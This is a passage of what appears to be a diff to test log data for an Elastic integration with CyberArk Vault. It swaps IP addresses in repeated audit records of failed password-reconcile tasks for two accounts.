Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615497142"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-14T13:18:15Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:18:15\n 2021-03-14T13:18:15Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=2;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:18:15","IsoTimestamp":"2021-03-14T13:18:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=2;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615727895"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-14T13:46:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:46:13\n 2021-03-14T13:46:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=34.123.103.115;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:46:13","IsoTimestamp":"2021-03-14T13:46:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=34.123.103.115;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-14T14:49:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 07:49:11\n 2021-03-14T14:49:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=3;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 07:49:11","IsoTimestamp":"2021-03-14T14:49:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=3;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615733350"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T10:12:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:18\n 2021-03-15T10:12:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=4;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:18","IsoTimestamp":"2021-03-15T10:12:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=4;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T10:12:19Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:19\n 2021-03-15T10:12:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=34.123.103.115;retriescount=1;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:19","IsoTimestamp":"2021-03-15T10:12:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=34.123.103.115;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T13:04:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:04:27\n 2021-03-15T13:04:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=34.123.103.115;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:04:27","IsoTimestamp":"2021-03-15T13:04:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=34.123.103.115;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615813465"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T14:44:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:44:37\n 2021-03-15T14:44:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=34.123.103.115;retriescount=1;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:44:37","IsoTimestamp":"2021-03-15T14:44:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=34.123.103.115;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<7>1 2021-03-11T21:12:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:12:22\n 2021-03-11T21:12:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:12:22","IsoTimestamp":"2021-03-11T21:12:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615497142"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-14T13:18:15Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:18:15\n 2021-03-14T13:18:15Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;retriescount=2;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:18:15","IsoTimestamp":"2021-03-14T13:18:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=2;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615727895"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-14T13:46:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:46:13\n 2021-03-14T13:46:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=67.43.156.15;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:46:13","IsoTimestamp":"2021-03-14T13:46:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=67.43.156.15;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-14T14:49:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 07:49:11\n 2021-03-14T14:49:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;retriescount=3;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 07:49:11","IsoTimestamp":"2021-03-14T14:49:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=3;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615733350"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T10:12:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:18\n 2021-03-15T10:12:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n 